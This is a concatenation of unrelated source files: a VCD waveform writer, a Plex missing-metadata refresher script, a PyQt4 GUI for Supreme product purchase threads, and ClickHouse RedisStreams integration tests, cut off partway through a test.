--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
plex_missing_metadata_refresher.py
|
#!/usr/bin/env python3
# This needs a specific fork+branch of plexapi till it's merged upstream:
# pip3 install --force -U --user
# git+git://github.com/darthShadow/python-plexapi@temp-guids-split
import time
import logging
import multiprocessing
import plexapi
import plexapi.server
import plexapi.exceptions
BATCH_SIZE = 100
PLEX_URL = "http://<plex_ip>:32400"
PLEX_TOKEN = "<plex_token>"
PLEX_REQUESTS_SLEEP = 0
SKIP_SECTIONS = {
"Movies": False,
"Movies - 4K": False,
"Movies - 4K DV": False,
"Movies - Anime": False,
"TV Shows": False,
"TV Shows - 4K": False,
"TV Shows - Asian": False,
"TV Shows - Anime": False,
"Audiobooks": True,
"Courses": True,
"Fitness": True,
"Sports": True,
}
MOVIE_SECTIONS = [
"Movies",
"Movies - 4K",
"Movies - 4K DV",
"Movies - Anime",
]
TV_SECTIONS_1 = [
"TV Shows",
]
TV_SECTIONS_2 = [
"TV Shows - 4K",
"TV Shows - Anime",
"TV Shows - Asian",
]
MISC_SECTIONS = [
"Audiobooks",
"Courses",
"Sports",
]
LOG_FORMAT = \
"[%(name)s][%(process)05d][%(asctime)s][%(levelname)-8s][%(funcName)-15s]"\
" %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG_LEVEL = logging.INFO
LOG_FILE = "/home/<username>/scripts/plex-missing-metadata-refresher.log"
plexapi.server.TIMEOUT = 3600
plexapi.server.X_PLEX_CONTAINER_SIZE = 500
# refresh_queue = multiprocessing.Manager().Queue()
logger = logging.getLogger("PlexMetadataRefresher")
def _item_iterator(plex_section, start, batch_size):
items = plex_section.search(
container_start=start,
maxresults=batch_size,
)
for item in items:
item.reload(checkFiles=True)
yield item
def _batch_get(plex_section, batch_size):
start = 0
while True:
if start >= plex_section.totalSize:
break
yield from _item_iterator(plex_section, start, batch_size)
start = start + 1 + batch_size
def _refresh_items(section, missing_metadata_items,
total_missing_metadata_items, analyze=True):
logger.info(f"Section : {section} | Refreshing Items with Missing "
"Metadata")
for item_index, item in enumerate(missing_metadata_items):
logger.info(f"[ {item_index + 1: >5} / "
f"{total_missing_metadata_items: >5} ] "
f"Section : {section} | Title : {item.title} | Refreshing")
try:
item.refresh()
if analyze:
item.analyze()
except plexapi.exceptions.BadRequest:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except plexapi.exceptions.NotFound:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
time.sleep(60)
def _refresh_missing_movie_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_metadata_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
try:
if not item.thumb or len(item.guids) == 0 or len(item.media) == 0 \
or item.media[0].bitrate == 0:
logger.info(f"Metadata Missing for Item : {item.title}"
f" ({item.year})")
missing_metadata_items.append(item)
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_metadata_items.append(item)
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
total_missing_metadata_items = len(missing_metadata_items)
logger.info(
f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Metadata : {total_missing_metadata_items}"
)
_refresh_items(section, missing_metadata_items,
total_missing_metadata_items)
time.sleep(900)
def _refresh_missing_tv_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_metadata_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
missing_metadata = False
try:
if not item.thumb:
missing_metadata = True
for episode in item.episodes():
if not episode.thumb or len(episode.media) == 0 or \
episode.media[0].bitrate == 0:
missing_metadata = True
logger.debug(f"Metadata Missing for Episode :"
f" {episode.title}")
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_metadata = True
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
if missing_metadata:
logger.info(f"Metadata Missing for Item : {item.title}"
f" ({item.year})")
missing_metadata_items.append(item)
total_missing_metadata_items = len(missing_metadata_items)
logger.info(
f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Metadata : {total_missing_metadata_items}"
)
_refresh_items(section, missing_metadata_items,
total_missing_metadata_items)
time.sleep(900)
def _refresh_missing_misc_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_thumb_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
try:
if not item.thumb:
logger.info(f"Metadata Missing for Item : {item.title}")
missing_thumb_items.append(item)
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_thumb_items.append(item)
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
total_missing_thumb_items = len(missing_thumb_items)
logger.info(f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Thumbs : {total_missing_thumb_items}")
_refresh_items(section, missing_thumb_items, total_missing_thumb_items,
analyze=False)
time.sleep(900)
def _setup_logger():
logging.Formatter.converter = time.gmtime
logging.raiseExceptions = False
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.propagate = False
detailed_formatter = logging.Formatter(fmt=LOG_FORMAT,
datefmt=LOG_DATE_FORMAT)
file_handler = logging.FileHandler(filename=LOG_FILE, mode="a+")
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(LOG_LEVEL)
logger.addHandler(file_handler)
def _refresh_movie_sections():
for section in MOVIE_SECTIONS:
_refresh_missing_movie_section(section)
def _refresh_tv_sections_1():
for section in TV_SECTIONS_1:
_refresh_missing_tv_section(section)
def _refresh_tv_sections_2():
for section in TV_SECTIONS_2:
_refresh_missing_tv_section(section)
def _refresh_misc_sections():
for section in MISC_SECTIONS:
_refresh_missing_misc_section(section)
#
#
# def _metadata_refresher():
# while True:
# item = refresh_queue.get()
# if item is None:
# break
# time.sleep(1)
def main():
_setup_logger()
producer_process_list = [
multiprocessing.Process(target=_refresh_tv_sections_1, args=()),
multiprocessing.Process(target=_refresh_tv_sections_2, args=()),
multiprocessing.Process(target=_refresh_misc_sections, args=()),
multiprocessing.Process(target=_refresh_movie_sections, args=()),
]
#
# consumer_process_list = [
# multiprocessing.Process(target=_metadata_refresher, args=()),
# ]
for idx, process in enumerate(producer_process_list):
print("Started Worker ::: {0}".format(idx + 1))
process.start()
#
# for idx, process in enumerate(consumer_process_list):
# print("Started Refresh Item Consumer ::: {0}".format(idx + 1))
# process.start()
for process in producer_process_list:
process.join()
# refresh_queue.put(None)
#
# for process in consumer_process_list:
# process.join()
if __name__ == "__main__":
main()
|
supreme_app.py
|
#!/usr/bin/python3
# Zachary Weeden 2018
import sys
import threading
from PyQt4 import QtGui
from supreme_3 import SupremeProduct
class SupremeWidget(QtGui.QWidget):
def __init__(self, user_config_dict):
"""
Constructor for GUI widget
"""
super(SupremeWidget, self).__init__()
# This is all our billing/shipping info
self.user_config_dict = user_config_dict
# layout stuff
# TODO also include config information here - billing, etc.
self.product_name_label = QtGui.QLabel(self)
self.product_name_label.setText('Product 1 name:')
self.product_name_field = QtGui.QLineEdit(self)
self.product_2_name_label = QtGui.QLabel(self)
self.product_2_name_label.setText('Product 2 name:')
self.product_2_name_field = QtGui.QLineEdit(self)
self.product_3_name_label = QtGui.QLabel(self)
self.product_3_name_label.setText('Product 3 name:')
self.product_3_name_field = QtGui.QLineEdit(self)
self.product_color_label = QtGui.QLabel(self)
self.product_color_label.setText('Product 1 color:')
self.product_color_field = QtGui.QLineEdit(self)
self.product_2_color_label = QtGui.QLabel(self)
self.product_2_color_label.setText('Product 2 color:')
self.product_2_color_field = QtGui.QLineEdit(self)
self.product_3_color_label = QtGui.QLabel(self)
self.product_3_color_label.setText('Product 3 color:')
self.product_3_color_field = QtGui.QLineEdit(self)
self.product_size_label = QtGui.QLabel(self)
self.product_size_label.setText('Product 1 size:')
self.product_size_field = QtGui.QLineEdit(self)
self.product_2_size_label = QtGui.QLabel(self)
self.product_2_size_label.setText('Product 2 size:')
self.product_2_size_field = QtGui.QLineEdit(self)
self.product_3_size_label = QtGui.QLabel(self)
self.product_3_size_label.setText('Product 3 size:')
self.product_3_size_field = QtGui.QLineEdit(self)
self.product_quantity_label = QtGui.QLabel(self)
self.product_quantity_label.setText('Product 1 quantity:')
self.product_quantity_field = QtGui.QLineEdit(self)
self.product_2_quantity_label = QtGui.QLabel(self)
self.product_2_quantity_label.setText('Product 2 quantity:')
self.product_2_quantity_field = QtGui.QLineEdit(self)
self.product_3_quantity_label = QtGui.QLabel(self)
self.product_3_quantity_label.setText('Product 3 quantity:')
self.product_3_quantity_field = QtGui.QLineEdit(self)
self.submit_button = QtGui.QPushButton("Submit")
self.exit_button = QtGui.QPushButton("Exit")
grid = QtGui.QGridLayout()
grid.setSpacing(20)
grid.addWidget(self.product_name_label, 1, 0)
grid.addWidget(self.product_name_field, 2, 0)
grid.addWidget(self.product_2_name_label, 1, 1)
grid.addWidget(self.product_2_name_field, 2, 1)
grid.addWidget(self.product_3_name_label, 1, 2)
grid.addWidget(self.product_3_name_field, 2, 2)
grid.addWidget(self.product_color_label, 3, 0)
grid.addWidget(self.product_color_field, 4, 0)
grid.addWidget(self.product_2_color_label, 3, 1)
grid.addWidget(self.product_2_color_field, 4, 1)
grid.addWidget(self.product_3_color_label, 3, 2)
grid.addWidget(self.product_3_color_field, 4, 2)
grid.addWidget(self.product_size_label, 5, 0)
grid.addWidget(self.product_size_field, 6, 0)
grid.addWidget(self.product_2_size_label, 5, 1)
grid.addWidget(self.product_2_size_field, 6, 1)
grid.addWidget(self.product_3_size_label, 5, 2)
grid.addWidget(self.product_3_size_field, 6, 2)
grid.addWidget(self.product_quantity_label, 7, 0)
grid.addWidget(self.product_quantity_field, 8, 0)
grid.addWidget(self.product_2_quantity_label, 7, 1)
grid.addWidget(self.product_2_quantity_field, 8, 1)
grid.addWidget(self.product_3_quantity_label, 7, 2)
grid.addWidget(self.product_3_quantity_field, 8, 2)
grid.addWidget(self.submit_button, 9, 0)
grid.addWidget(self.exit_button, 9, 2)
self.field_elements = {
self.product_name_field:{
'color': self.product_color_field,
'size': self.product_size_field,
'quantity': self.product_quantity_field
},
self.product_2_name_field: {
'color': self.product_2_color_field,
'size': self.product_2_size_field,
'quantity': self.product_2_quantity_field
},
self.product_3_name_field: {
'color': self.product_3_color_field,
'size': self.product_3_size_field,
'quantity': self.product_3_quantity_field
}
}
# slots
self.submit_button.clicked.connect(lambda: self.set_all())
self.exit_button.clicked.connect(lambda: self.exit())
self.setLayout(grid)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('Supreme')
self.show()
def set_all(self):
# TODO Set class attributes for this product search and clear fields for next item
# TODO Allow for concurrent searches and display background tasks
for product_field in self.field_elements:
if product_field.text() == '':
print('Name not given for this product - skipping')
continue
self.product_name = product_field.text()
self.product_color = self.field_elements[product_field]['color'].text()
self.product_size = self.field_elements[product_field]['size'].text()
self.product_quantity = int(self.field_elements[product_field]['quantity'].text())
product_thread = threading.Thread(target=SupremeProduct, args=(self.product_name, self.product_color, self.product_size, self.product_quantity, self.user_config_dict,))
print(f'[[ Thread ]] {str(self.product_name)} :: {str(self.product_size)} :: {str(self.product_color)} :: {str(self.product_quantity)} :: Thread initialized!')
product_thread.start()
def exit(self):
"""
Exit logic used when exit button pressed on gui
:return:
"""
print('State: Exitting')
sys.exit()
def main():
"""
Main of lab 3 desktop gui
:return:
"""
app = QtGui.QApplication(sys.argv)
supremeWidget = SupremeWidget()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
test.py
|
import json
import os.path as p
import random
import subprocess
import threading
import logging
import time
from random import randrange
import math
import redis
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster, check_redis_is_available
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance(
"instance",
main_configs=[
"configs/macros.xml",
"configs/redis.xml",
"configs/named_collection.xml",
],
user_configs=["configs/users.xml"],
with_redis=True
)
# Helpers
def redis_check_result(result, check=False, ref_file="test_redis_json.reference"):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def wait_redis_to_start(redis_docker_id, timeout=180, throw=True):
start = time.time()
while time.time() - start < timeout:
try:
if check_redis_is_available(redis_docker_id):
logging.debug("Redis is available")
return
time.sleep(0.5)
except Exception as ex:
logging.debug("Can't connect to Redis " + str(ex))
time.sleep(0.5)
def kill_redis(redis_id):
p = subprocess.Popen(("docker", "stop", redis_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def revive_redis(redis_id):
p = subprocess.Popen(("docker", "start", redis_id), stdout=subprocess.PIPE)
p.communicate()
wait_redis_to_start(redis_id)
# Fixtures
@pytest.fixture(scope="module")
def redis_cluster():
try:
cluster.start()
logging.debug("redis_id is {}".format(instance.cluster.redis_docker_id))
instance.query("CREATE DATABASE test")
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def redis_setup_teardown():
print("redis is available - running test")
yield # run test
instance.query("DROP DATABASE test NO DELAY")
instance.query("CREATE DATABASE test")
# Tests
def test_redis_select(redis_cluster):
stream_name = 'select'
group_name = 'test_select'
connection = redis.Redis(host=redis_cluster.redis_ip, port=cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
# The order of messages in select * from test.redis is not guaranteed, so sleep to collect everything in one select
connection.close()
time.sleep(1)
result = ""
while True:
result += instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if redis_check_result(result):
break
redis_check_result(result, True)
def test_redis_select_empty(redis_cluster):
stream_name = 'empty'
group_name = 'test_empty'
connection = redis.Redis(redis_cluster.redis_ip, port=cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.close()
assert int(instance.query("SELECT count() FROM test.redis")) == 0
def test_redis_macros(redis_cluster):
stream_name = 'macro'
group_name = 'test_macro'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{redis_broker}',
redis_stream_list = '{redis_stream_list}',
redis_group_name = '{redis_group_name}';
"""
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
time.sleep(1)
result = ""
while True:
result += instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if redis_check_result(result):
break
redis_check_result(result, True)
def test_redis_materialized_view(redis_cluster):
stream_name = 'mv'
group_name = 'test_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.redis group by (key, value);
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
time_limit_sec = 60
deadline = time.monotonic() + time_limit_sec
result = None
while time.monotonic() < deadline:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
deadline = time.monotonic() + time_limit_sec
while time.monotonic() < deadline:
result = instance.query("SELECT * FROM test.view2 ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
connection.close()
def test_redis_materialized_view_with_subquery(redis_cluster):
stream_name = 'mvsq'
group_name = 'test_mvsq'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.redis);
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
connection.close()
redis_check_result(result, True)
def test_redis_many_materialized_views(redis_cluster):
stream_name = 'mmv'
group_name = 'test_mmv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = 1;
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.redis;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result1 = instance.query("SELECT * FROM test.view1 ORDER BY key")
result2 = instance.query("SELECT * FROM test.view2 ORDER BY key")
if redis_check_result(result1) and redis_check_result(result2):
break
instance.query(
"""
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
"""
)
connection.close()
redis_check_result(result1, True)
redis_check_result(result2, True)
def test_redis_big_message(redis_cluster):
# Create messages of size ~100Kb
redis_messages = 1000
batch_size = 1000
messages = [
{"key": i, "value": "x" * 100 * batch_size}
for i in range(redis_messages)
]
stream_name = 'big'
group_name = 'test_big'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value String)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for message in messages:
connection.xadd(stream_name, message)
while True:
result = instance.query("SELECT count() FROM test.view")
if int(result) == redis_messages:
break
connection.close()
assert (
int(result) == redis_messages
), "ClickHouse lost some messages: {}".format(result)
def test_redis_multiple_streams_and_consumers(redis_cluster):
NUM_STREAMS = 10
NUM_CONSUMERS = 10
streams = []
group_name = 'test_multiple'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('multiple_{}'.format(i))
connection.xgroup_create(streams[-1], group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = {};
CREATE TABLE test.view (key UInt64, value UInt64, stream_id String)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _stream AS stream_id FROM test.redis;
""".format(
redis_cluster.redis_host,
','.join(streams),
group_name,
NUM_CONSUMERS
)
)
i = [0]
messages_num = 10000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = NUM_STREAMS * 2
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT stream_id) FROM test.view")
for thread in threads:
thread.join()
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages"
assert int(result2) == 10
def test_redis_mv_combo(redis_cluster):
NUM_STREAMS = 2
NUM_CONSUMERS = 5
NUM_MV = 5
streams = []
group_name = 'test_combo'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('combo_{}'.format(i))
connection.xgroup_create(streams[-1], group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = {};
""".format(
redis_cluster.redis_host,
','.join(streams),
group_name,
NUM_CONSUMERS
)
)
query = ""
for mv_id in range(NUM_MV):
query += """
DROP TABLE IF EXISTS test.combo_{0};
DROP TABLE IF EXISTS test.combo_{0}_mv;
CREATE TABLE test.combo_{0} (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.combo_{0}_mv TO test.combo_{0} AS
SELECT * FROM test.redis;
""".format(
mv_id
)
instance.query(query)
time.sleep(2)
for mv_id in range(NUM_MV):
instance.query("SELECT count() FROM test.combo_{0}".format(mv_id))
i = [0]
messages_num = 10000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = NUM_STREAMS * 5
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
for _ in range(20):
result = 0
for mv_id in range(NUM_MV):
num = int(
instance.query("SELECT count() FROM test.combo_{0}".format(mv_id))
)
logging.warning(str(num) + '\n')
result += num
if int(result) == messages_num * threads_num * NUM_MV:
break
time.sleep(1)
for thread in threads:
thread.join()
for mv_id in range(NUM_MV):
instance.query(
"""
DROP TABLE test.combo_{0}_mv;
DROP TABLE test.combo_{0};
""".format(
mv_id
)
)
assert (
int(result) == messages_num * threads_num * NUM_MV
), "ClickHouse lost some messages: {}".format(result)
def test_redis_insert(redis_cluster):
stream_name = 'insert'
group_name = 'test_insert'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query("INSERT INTO test.redis VALUES {}".format(values))
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
while True:
insert_messages = connection.xread({stream_name: "0-0"}, count=50)
# xread returns list of lists of topics and messages - select first topic and its messages
insert_messages = insert_messages[0][1]
logging.warning(insert_messages)
if len(insert_messages) == 50:
break
result = "\n".join(map(lambda x: x[1]["key".encode()].decode() + "\t" + x[1]["value".encode()].decode(), insert_messages))
redis_check_result(result, True)
def test_redis_insert_into_table_with_many_streams_wrong(redis_cluster):
stream_names = ['insert_many_streams_wrong1', 'insert_many_streams_wrong2']
group_name = 'test_insert_many_streams_wrong'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for stream_name in stream_names:
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
','.join(stream_names),
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
instance.query_and_get_error("INSERT INTO test.redis VALUES {}".format(values))
def test_redis_insert_into_table_with_many_streams_right(redis_cluster):
stream_names = ['insert_many_streams_right1', 'insert_many_streams_right2']
group_name = 'test_insert_many_streams_right'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for stream_name in stream_names:
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
